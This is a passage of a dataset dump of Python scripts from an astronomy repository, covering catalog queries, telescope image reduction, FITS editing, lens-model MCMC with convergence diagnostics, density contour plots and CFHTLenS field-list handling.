r[j]['dist']*3600,r[j]['ra'],r[j]['dec'],r[j]['phot_g_mean_mag'],r[j]['astrometric_excess_noise'],r[j]['astrometric_excess_noise_sig'],np.sqrt((r[j]['pmra']/r[j]['pmra_error'])**2+(r[j]['pmdec']/r[j]['pmdec_error'])**2)\n\ndef panstarrs_query(ra_deg, dec_deg, rad_asec, maxmag=23,\n maxsources=1): # from https://michaelmommert.wordpress.com/2017/02/13/accessing-the-gaia-and-pan-starrs-catalogs-using-python/\n \"\"\"\n Query PanSTARRS @ VizieR using astroquery.vizier\n :param ra_deg: RA in degrees\n :param dec_deg: Declination in degrees\n :param rad_deg: field radius in degrees\n :param maxmag: upper limit G magnitude (optional)\n :param maxsources: maximum number of sources\n :return: astropy.table object\n \"\"\"\n vquery = Vizier(columns=['RAJ2000', 'DEJ2000',\n 'gmag', 'e_gmag',\n 'rmag', 'e_rmag',\n 'imag', 'e_imag'],\n column_filters={\"gmag\":\n (\"<%f\" % maxmag)},\n row_limit=maxsources)\n field = coord.SkyCoord(ra=ra_deg, dec=dec_deg,\n unit=(u.deg, u.deg),\n frame='icrs')\n return vquery.query_region(field,\n width=(\"%fd\" % (rad_asec / 3600.0)),\n catalog=\"II/349/ps1\")[0]\n\nif search == \"PS1\":\n rad = 1.0 # arcsec\n from astroquery.vizier import Vizier\n import astropy.coordinates as coord\n for i in range(len(cat[0])):\n try: print(panstarrs_query(cat[0][i], cat[1][i], 2))\n except: pass\n" }, { "alpha_fraction": 0.5877862572669983, "alphanum_fraction": 0.6005089282989502, "avg_line_length": 18.600000381469727, "blob_id": "31c722ad15e8a4858c36f43caaeea3e55a290d14", "content_id": "31881dd544f7530888b65f2c0e0cede507a848fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 393, "license_type": "no_license", "max_line_length": 71, "num_lines": 20, "path": "/python/modeling_utilities/mytest_classes.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "\nclass MyClass:\n \"\"\"A simple example class\"\"\"\n i = 12345\n \n def f(self):\n return 'hello world'\n\n# import mytest\n# x=mytest.MyClass.i\n# x=mytest.MyClass.f()\n\nclass Dog:\n\n kind = 'canine' # class variable shared by all instances\n\n def __init__(self, name):\n self.name = name # instance variable unique to each instance\n\n# x=mytest.Dog('Fido')\n# x.name\n" }, { "alpha_fraction": 0.67641681432724, "alphanum_fraction": 0.6959171295166016, "avg_line_length": 48.727272033691406, "blob_id": "194f8b7d874970e00477e9466097953ac714db5b", "content_id": "e08a050ed2633938b9be2a384c647f20048e68ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1641, "license_type": "no_license", "max_line_length": 260, "num_lines": 33, "path": "/python/reduction_utilities/IRCSquickreduce.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# run as: source activate iraf27; python /Users/cerusu/GITHUB/zMstarPDF/python/reduction_utilities/IRCSquickreduce.py /Volumes/LaCieSubaru/J1640+1932/H/\n\nimport os\nimport numpy as np\nfrom numpy import inf\nfrom astropy.io import fits\nimport numpy as np\nimport sys\nimport glob\n\nos.system('/Applications/ds9.darwinsierra.7.5/ds9 &')\npath = str(sys.argv[1])\n#target = str(sys.argv[2])\ntarget = 'reduced'\ntry: os.mkdir(path+target)\nexcept: pass\nos.chdir(path+target)\nfiles = glob.glob('../*.fits')\nfilesuse = []\nfor i in range(len(files)):\n frame = fits.open(files[i])\n #if (frame[0].header['OBJECT'] == target) and (files[i] != '../flat.fits'): filesuse = np.append(filesuse,files[i])\n if files[i] != '../flat.fits': filesuse = np.append(filesuse,files[i])\n\nnp.savetxt(target+'.cat',filesuse,fmt='%s')\nos.system('python /Users/cerusu/GITHUB/pyircs_imgred/frcheck.py %s' % target+'.cat')\ncreateflat = False\nif createflat == True:\n os.system('python /Users/cerusu/GITHUB/pyircs_imgred/imgred_all.py %s %s.fits --combine=median --skyflat --flat=%sflat.fits --bpm=/Users/cerusu/GITHUB/pyircs_imgred/DATA/ircs_bpmask.fits --start=0 --end=1' %(target+'.cat',target,target))\n os.system('cp %sflat.fits ../../' % target)\nelse:\n os.system('python /Users/cerusu/GITHUB/pyircs_imgred/imgred_all.py %s %s.fits --combine=median --flat=../../J2354_flat.fits --bpm=/Users/cerusu/GITHUB/pyircs_imgred/DATA/ircs_bpmask.fits --start=0 --end=8 --nsigma=10 --minpix=1000' %(target+'.cat',target))\n# !!!!!!!!!!!!! When the pipeline says Select Object --> type a , Quit --> type q on the ds9 image: I need to press first a than q on the same frame\n" }, { "alpha_fraction": 0.6148409843444824, "alphanum_fraction": 0.7067137956619263, "avg_line_length": 22.5, "blob_id": "0fe1de90acda662943345797804cf0deea2f2cc8", "content_id": "56fd20d930fd13a263d969de472bb73b97b57666", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 283, "license_type": "no_license", "max_line_length": 51, "num_lines": 12, "path": "/python/image_utilities/replaceregioninsidemultiextension.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Replace\n\nimport numpy as np\nfrom astropy.io import fits\n\norig = fits.open('patch.fits')\nreplace = fits.open('LR.20141121.11919_2_bin.fits')\norig_ = orig[4].data\nreplace_ = replace[0].data\norig_[0:2058,0:369] = replace_\norig[1].data = orig_\norig.writeto('patch.fits',clobber=True)\n\n" }, { "alpha_fraction": 0.5648224353790283, "alphanum_fraction": 0.60748690366745, "avg_line_length": 51.411766052246094, "blob_id": "5e4fa825d630b225e07a75860f44b7af3c8d44ee", "content_id": "dc4b07a254951a1a7564d6295e24b177dd2b5462", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3633, "license_type": "no_license", "max_line_length": 355, "num_lines": 68, "path": "/python/modeling_utilities/mcmc_glafic.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Given the best-fit input file from glafic, run 10 mcmc chains, combine them (accounting for burn-in) and plot the histogram with the 16th and 84th percentiles, using the corner package. It also computes the R_hat convergence diagnostic.\r\n\r\nimport sys\r\nimport os\r\nimport numpy as np\r\nimport corner\r\n\r\nfile = \"point1pertSIEgamma.input\"\r\nlength = 400000\n\r\nfor i in range(10): #10\r\n os.system(\"cp %s %s\" % (file,file[:-6] + str(i+1) + \".input\"))\r\n with open(file[:-6] + str(i+1) + \".input\", 'r') as f:\r\n glafic = f.readlines()\r\n glafic[10 - 1] = \"prefix %s\" % file[:-6] + str(i+1) + \"\\n\"\r\n glafic[20 - 1] = \"ran_seed -%s\" % str(i+1) + \"\\n\"\r\n glafic[55 - 1] = \"mcmc %s\" % str(length) + \"\\n\"\r\n with open(file[:-6] + str(i+1) + \".input\", 'w') as f:\r\n f.writelines(glafic)\r\n f.close()\r\n\r\nos.system(\"glafic %s & glafic %s & glafic %s & glafic %s & glafic %s & glafic %s & glafic %s & glafic %s & glafic %s & glafic %s\" % (file[:-6] + \"1.input\",file[:-6] + \"2.input\",file[:-6] + \"3.input\",file[:-6] + \"4.input\",file[:-6] + \"5.input\",file[:-6] + \"6.input\",file[:-6] + \"7.input\",file[:-6] + \"8.input\",file[:-6] + \"9.input\",file[:-6] + \"10.input\"))\r\n\r\nfor i in range(10):#10\r\n mcmc = np.loadtxt(file[:-6] + str(i+1) + \"_mcmc.dat\",unpack=True)\r\n mcmci = mcmc[1:,int(np.shape(mcmc)[1]/4):np.shape(mcmc)[1]] # eliminate the first column, containing chi^2, as well as the first 25% of the chains\r\n if i == 0: mcmcfinal = mcmci\r\n else: mcmcfinal = np.append(mcmcfinal,mcmci, axis = 1)\r\n\r\n if i == 0: mcmc0 = mcmci\r\n if i == 1: mcmc1 = mcmci\r\n if i == 2: mcmc2 = mcmci\r\n if i == 3: mcmc3 = mcmci\r\n if i == 4: mcmc4 = mcmci\r\n if i == 5: mcmc5 = mcmci\r\n if i == 6: mcmc6 = mcmci\r\n if i == 7: mcmc7 = mcmci\r\n if i == 8: mcmc8 = mcmci\r\n if i == 9: mcmc9 = mcmci\r\n\r\n# Convergence diagnostics with Gelman-Rubin 1995 R_hat\r\ndef R_hat(samples): # https://groups.google.com/forum/#!topic/hddm-users/qWzCWTz-wFQ # formulas in https://pymc-devs.github.io/pymc/modelchecking.html\r\n m, n = np.shape(samples) # m = chains, n = samples\r\n # Chain variance\r\n chain_var = np.var(samples, axis=1, ddof=1) # degrees of freedom = n-ddof\r\n # Within-chain variance (mean of variances of each chain)\r\n W = 1./m * np.sum(chain_var)\r\n # Chain means\r\n chain_means = np.mean(samples, axis=1)\r\n # mean_of_means = numpy.mean(chain_means) # all chains have same length\r\n # Variance of chain means\r\n chain_means_var = np.var(chain_means, ddof=1)\r\n # Between-chain variance\r\n B = n * chain_means_var\r\n # Weighted average of within and between variance\r\n #(marginal posterior variance)\r\n Var_hat = (float(n-1)/n)*W + B/n\r\n # Potential scale reduction factor\r\n R_hat = np.sqrt(Var_hat / W)\r\n return R_hat\r\n\r\nminsize = np.min([np.shape(mcmc0)[1],np.shape(mcmc1)[1],np.shape(mcmc2)[1],np.shape(mcmc3)[1],np.shape(mcmc4)[1],np.shape(mcmc5)[1],np.shape(mcmc6)[1],np.shape(mcmc7)[1],np.shape(mcmc8)[1],np.shape(mcmc9)[1]])\r\nfor i in range(np.shape(mcmc)[0] - 1): # added -1\r\n samples = np.vstack((mcmc0[i][:minsize],mcmc1[i][:minsize],mcmc2[i][:minsize],mcmc3[i][:minsize],mcmc4[i][:minsize],mcmc5[i][:minsize],mcmc6[i][:minsize],mcmc7[i][:minsize],mcmc8[i][:minsize],mcmc9[i][:minsize]))\r\n print \"[%d] R_hat = \" %(i+1), R_hat(samples) # added +1\r\n\r\nfigure = corner.corner(mcmcfinal[0:np.shape(mcmcfinal)[0]].T, labels=np.linspace(1,np.shape(mcmcfinal)[0],np.shape(mcmcfinal)[0]).astype(int).tolist(),quantiles=[0.16, 0.5, 0.84],show_titles=True, title_kwargs={\"fontsize\": 12})\r\nfigure.savefig(file[:-6] + \"_mcmc.png\", dpi=100)\r\n\r\n" }, { "alpha_fraction": 0.699999988079071, "alphanum_fraction": 0.7206896543502808, "avg_line_length": 21.230770111083984, "blob_id": "5cc24528abe92196382b01d25542b68f2a0b8d68", "content_id": "068d81de38ee0d908c19eaa45a1c447d24a4bd37", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 290, "license_type": "no_license", "max_line_length": 45, "num_lines": 13, "path": "/python/image_utilities/normalize.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Simple code to normalize an image\n\nimport numpy as np\nfrom astropy.io import fits\nimport sys\n\nimage = fits.open(str(sys.argv[1]))\ndata = image[0].data\nsum = np.sum(image[0].data)\ndata = image[0].data/sum\nimagex = image\nimagex[0].data = data\nimagex.writeto(str(sys.argv[2]),clobber=True)\n\n" }, { "alpha_fraction": 0.5884048342704773, "alphanum_fraction": 0.6128157377243042, "avg_line_length": 41.290321350097656, "blob_id": "bdab8f94e2c0fe1be610c1131f2d662f9818d9dd", "content_id": "6c8f00bceb3c81e83882b2263e6f8c4d45a5711f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11798, "license_type": "no_license", "max_line_length": 132, "num_lines": 279, "path": "/python/plot_utilities/density_contour.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.optimize as so\n\ndef find_confidence_interval(x, pdf, confidence_level):\n return pdf[pdf > x].sum() - confidence_level\n\ndef density_contour(xdata, ydata, nbins_x, nbins_y, ax=None, **contour_kwargs):\n \"\"\" Create a density contour plot.\n\n Parameters\n ----------\n xdata : numpy.ndarray\n ydata : numpy.ndarray\n nbins_x : int\n Number of bins along x dimension\n nbins_y : int\n Number of bins along y dimension\n ax : matplotlib.Axes (optional)\n If supplied, plot the contour to this axis. Otherwise, open a new figure\n contour_kwargs : dict\n kwargs to be passed to pyplot.contour()\n \"\"\"\n\n H, xedges, yedges = np.histogram2d(xdata, ydata, bins=(nbins_x,nbins_y), normed=True)\n x_bin_sizes = (xedges[1:] - xedges[:-1]).reshape((1,nbins_x))\n y_bin_sizes = (yedges[1:] - yedges[:-1]).reshape((nbins_y,1))\n\n pdf = (H*(x_bin_sizes*y_bin_sizes))\n\n one_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.68))\n two_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.95))\n three_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.99))\n levels = [one_sigma, two_sigma, three_sigma]\n\n X, Y = 0.5*(xedges[1:]+xedges[:-1]), 0.5*(yedges[1:]+yedges[:-1])\n Z = pdf.T\n\n if ax == None:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour = plt.contour(X, Y, Z, levels=levels, origin=\"lower\", colors=('red','magenta','blue'), linewidths = 0.7)\n else:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour = ax.contour(X, Y, Z, levels=levels, origin=\"lower\", colors=('red','magenta','blue'), linewidths = 0.7)\n\n return contour\n\ndef density_contourdash(xdata, ydata, nbins_x, nbins_y, ax=None, **contour_kwargs):\n \"\"\" Create a density contour plot.\n\n Parameters\n ----------\n xdata : numpy.ndarray\n ydata : numpy.ndarray\n nbins_x : int\n Number of bins along x dimension\n nbins_y : int\n Number of bins along y dimension\n ax : matplotlib.Axes (optional)\n If supplied, plot the contour to this axis. Otherwise, open a new figure\n contour_kwargs : dict\n kwargs to be passed to pyplot.contour()\n \"\"\"\n\n H, xedges, yedges = np.histogram2d(xdata, ydata, bins=(nbins_x,nbins_y), normed=True)\n x_bin_sizes = (xedges[1:] - xedges[:-1]).reshape((1,nbins_x))\n y_bin_sizes = (yedges[1:] - yedges[:-1]).reshape((nbins_y,1))\n\n pdf = (H*(x_bin_sizes*y_bin_sizes))\n\n one_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.68))\n two_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.95))\n three_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.99))\n levels1 = [one_sigma]\n levels2 = [two_sigma]\n levels3 = [three_sigma]\n\n X, Y = 0.5*(xedges[1:]+xedges[:-1]), 0.5*(yedges[1:]+yedges[:-1])\n Z = pdf.T\n\n if ax == None:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour1 = plt.contour(X, Y, Z, levels=levels1, origin=\"lower\", colors=('black'), linewidths = 0.7, linestyles = 'solid')\n else:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour1 = ax.contour(X, Y, Z, levels=levels1, origin=\"lower\", colors=('black'), linewidths = 0.7, linestyles = 'solid')\n\n if ax == None:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour2 = plt.contour(X, Y, Z, levels=levels2, origin=\"lower\", colors=('black'), linewidths = 0.7, linestyles = 'dashed')\n else:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour2 = ax.contour(X, Y, Z, levels=levels2, origin=\"lower\", colors=('black'), linewidths = 0.7, linestyles = 'dashed')\n\n if ax == None:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour3 = plt.contour(X, Y, Z, levels=levels3, origin=\"lower\", colors=('black'), linewidths = 0.7, linestyles = 'dotted')\n else:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour3 = ax.contour(X, Y, Z, levels=levels3, origin=\"lower\", colors=('black'), linewidths = 0.7, linestyles = 'dotted')\n\n return contour1,contour2,contour3\n\ndef density_contourdashmagenta(xdata, ydata, nbins_x, nbins_y, ax=None, **contour_kwargs):\n \"\"\" Create a density contour plot.\n \n Parameters\n ----------\n xdata : numpy.ndarray\n ydata : numpy.ndarray\n nbins_x : int\n Number of bins along x dimension\n nbins_y : int\n Number of bins along y dimension\n ax : matplotlib.Axes (optional)\n If supplied, plot the contour to this axis. Otherwise, open a new figure\n contour_kwargs : dict\n kwargs to be passed to pyplot.contour()\n \"\"\"\n \n H, xedges, yedges = np.histogram2d(xdata, ydata, bins=(nbins_x,nbins_y), normed=True)\n x_bin_sizes = (xedges[1:] - xedges[:-1]).reshape((1,nbins_x))\n y_bin_sizes = (yedges[1:] - yedges[:-1]).reshape((nbins_y,1))\n \n pdf = (H*(x_bin_sizes*y_bin_sizes))\n \n one_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.68))\n two_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.95))\n three_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.99))\n levels1 = [one_sigma]\n levels2 = [two_sigma]\n levels3 = [three_sigma]\n \n X, Y = 0.5*(xedges[1:]+xedges[:-1]), 0.5*(yedges[1:]+yedges[:-1])\n Z = pdf.T\n \n if ax == None:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour1 = plt.contour(X, Y, Z, levels=levels1, origin=\"lower\", colors=('magenta'), linewidths = 0.7, linestyles = 'solid')\n else:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour1 = ax.contour(X, Y, Z, levels=levels1, origin=\"lower\", colors=('magenta'), linewidths = 0.7, linestyles = 'solid')\n \n if ax == None:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour2 = plt.contour(X, Y, Z, levels=levels2, origin=\"lower\", colors=('magenta'), linewidths = 0.7, linestyles = 'dashed')\n else:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour2 = ax.contour(X, Y, Z, levels=levels2, origin=\"lower\", colors=('magenta'), linewidths = 0.7, linestyles = 'dashed')\n \n if ax == None:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour3 = plt.contour(X, Y, Z, levels=levels3, origin=\"lower\", colors=('magenta'), linewidths = 0.7, linestyles = 'dotted')\n else:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour3 = ax.contour(X, Y, Z, levels=levels3, origin=\"lower\", colors=('magenta'), linewidths = 0.7, linestyles = 'dotted')\n \n return contour1,contour2,contour3\n\ndef density_contourdashblue(xdata, ydata, nbins_x, nbins_y, ax=None, **contour_kwargs):\n \"\"\" Create a density contour plot.\n \n Parameters\n ----------\n xdata : numpy.ndarray\n ydata : numpy.ndarray\n nbins_x : int\n Number of bins along x dimension\n nbins_y : int\n Number of bins along y dimension\n ax : matplotlib.Axes (optional)\n If supplied, plot the contour to this axis. Otherwise, open a new figure\n contour_kwargs : dict\n kwargs to be passed to pyplot.contour()\n \"\"\"\n \n H, xedges, yedges = np.histogram2d(xdata, ydata, bins=(nbins_x,nbins_y), normed=True)\n x_bin_sizes = (xedges[1:] - xedges[:-1]).reshape((1,nbins_x))\n y_bin_sizes = (yedges[1:] - yedges[:-1]).reshape((nbins_y,1))\n \n pdf = (H*(x_bin_sizes*y_bin_sizes))\n \n one_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.68))\n two_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.95))\n three_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.99))\n levels1 = [one_sigma]\n levels2 = [two_sigma]\n levels3 = [three_sigma]\n \n X, Y = 0.5*(xedges[1:]+xedges[:-1]), 0.5*(yedges[1:]+yedges[:-1])\n Z = pdf.T\n \n if ax == None:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour1 = plt.contour(X, Y, Z, levels=levels1, origin=\"lower\", colors=('blue'), linewidths = 0.7, linestyles = 'solid')\n else:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour1 = ax.contour(X, Y, Z, levels=levels1, origin=\"lower\", colors=('blue'), linewidths = 0.7, linestyles = 'solid')\n \n if ax == None:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour2 = plt.contour(X, Y, Z, levels=levels2, origin=\"lower\", colors=('blue'), linewidths = 0.7, linestyles = 'dashed')\n else:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour2 = ax.contour(X, Y, Z, levels=levels2, origin=\"lower\", colors=('blue'), linewidths = 0.7, linestyles = 'dashed')\n \n if ax == None:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour3 = plt.contour(X, Y, Z, levels=levels3, origin=\"lower\", colors=('blue'), linewidths = 0.7, linestyles = 'dotted')\n else:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour3 = ax.contour(X, Y, Z, levels=levels3, origin=\"lower\", colors=('blue'), linewidths = 0.7, linestyles = 'dotted')\n \n return contour1,contour2,contour3\n\ndef density_contourfill(xdata, ydata, nbins_x, nbins_y, ax=None, **contour_kwargs):\n \"\"\" Create a density contour plot.\n\n Parameters\n ----------\n xdata : numpy.ndarray\n ydata : numpy.ndarray\n nbins_x : int\n Number of bins along x dimension\n nbins_y : int\n Number of bins along y dimension\n ax : matplotlib.Axes (optional)\n If supplied, plot the contour to this axis. Otherwise, open a new figure\n contour_kwargs : dict\n kwargs to be passed to pyplot.contour()\n \"\"\"\n\n H, xedges, yedges = np.histogram2d(xdata, ydata, bins=(nbins_x,nbins_y), normed=True)\n x_bin_sizes = (xedges[1:] - xedges[:-1]).reshape((1,nbins_x))\n y_bin_sizes = (yedges[1:] - yedges[:-1]).reshape((nbins_y,1))\n\n pdf = (H*(x_bin_sizes*y_bin_sizes))\n\n one_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.68))\n two_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.95))\n three_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.99))\n levels1 = [one_sigma,0]\n levels2 = [two_sigma,one_sigma]\n levels3 = [three_sigma,two_sigma]\n\n X, Y = 0.5*(xedges[1:]+xedges[:-1]), 0.5*(yedges[1:]+yedges[:-1])\n Z = pdf.T\n\n if ax == None:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour1 = plt.contourf(X, Y, Z, levels=levels1, origin=\"lower\", colors=('black'))\n else:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour1 = ax.contourf(X, Y, Z, levels=levels1, origin=\"lower\", colors=('black'))\n\n if ax == None:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour2 = plt.contourf(X, Y, Z, levels=levels2, origin=\"lower\", colors=('gray'))\n else:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour2 = ax.contourf(X, Y, Z, levels=levels2, origin=\"lower\", colors=('gray'))\n\n if ax == None:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour3 = plt.contourf(X, Y, Z, levels=levels3, alpha=0.5, origin=\"lower\", colors=('gray'))\n else:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour3 = ax.contourf(X, Y, Z, levels=levels3, alpha=0.5, origin=\"lower\", colors=('gray'))\n\n return contour1,contour2,contour3\n\n\n\n#def test_density_contour():\n# norm = np.random.normal(10., 15., size=(12540035, 2))\n# density_contour(norm[:,0], norm[:,1], 100, 100)\n# plt.show()\n\n#test_density_contour()" }, { "alpha_fraction": 0.6813559532165527, "alphanum_fraction": 0.7152542471885681, "avg_line_length": 31.77777862548828, "blob_id": "5153b773d44fd56b78e4d2dbcebdda294bccc77e", "content_id": "74e7b350da811edf4d62b49644a0692ac2057e86", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 295, "license_type": "no_license", "max_line_length": 62, "num_lines": 9, "path": "/python/image_utilities/mask_repair.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Simple script to change pixel values in custom regions\n\nimport numpy as np\nfrom astropy.io import fits\n\nimage = fits.open(\"ch2_4amin_nolens.fits\")\nimagem = fits.open(\"msk.fits\")\nimage[0].data[(imagem[0].data == 1) & (image[0].data < 0)] = 0\nimage.writeto(\"ch2_4amin_nolens.fits\",clobber=True)\n" }, { "alpha_fraction": 0.5420274138450623, "alphanum_fraction": 0.6463176608085632, "avg_line_length": 79.95619201660156, "blob_id": "bdedd6f635a4fb329f54f1317b82ef67ab7e7bf0", "content_id": "6ea53a1b1cb63cbd4cf95ee3a07d371a35c9fb35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 149688, "license_type": "no_license", "max_line_length": 190, "num_lines": 1849, "path": "/python/weightingsizeplotsuniversal.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# fields CFHTLenS W1-4\n# subfields: 171 1deg^2 throughout W1-4\n# cells: 4x4arcmin covering each subfield, in a grid\n# usage: use one of the following arguments: lens name, orig or samp, followed by maglimit\n\nimport numpy as np\nimport sys\nimport os\nfrom os import system\n#import scipy\n#from scipy import special\n#from astropy.io import fits\n#from astropy.wcs import WCS\n#from astropy import units as u\n#from astropy.coordinates import SkyCoord\n#from astropy.io import ascii\n#from astropy.table import Table, Column\nimport time\nimport matplotlib.pyplot as plt\n#from numpy.random import normal\n#from scipy.stats.kde import gaussian_kde\nfrom numpy import linspace\n\nprint(\"Arguments: \\n Lens field: %s \\n Original values or samples drawn from P(z) and P(Mstar): %s \\n Limiting i-band magnitude: %s\" % (str(sys.argv[1]), str(sys.argv[2]), str(sys.argv[3])))\n\nif str(sys.argv[2]) == \"samp\":\n print \"This process is both processor and memory intensive and will take a couple of hours for a sampling of 1000...\"\n start_time = time.time()\n\nwith open('fieldsforhist50try_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW1_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W1\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW2_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W2\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW3_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W3\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW4_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldsforhist75try_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW1_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W1\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW2_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W2\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW3_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W3\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW4_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldsforhist50try_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W1\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W2\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W3\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as 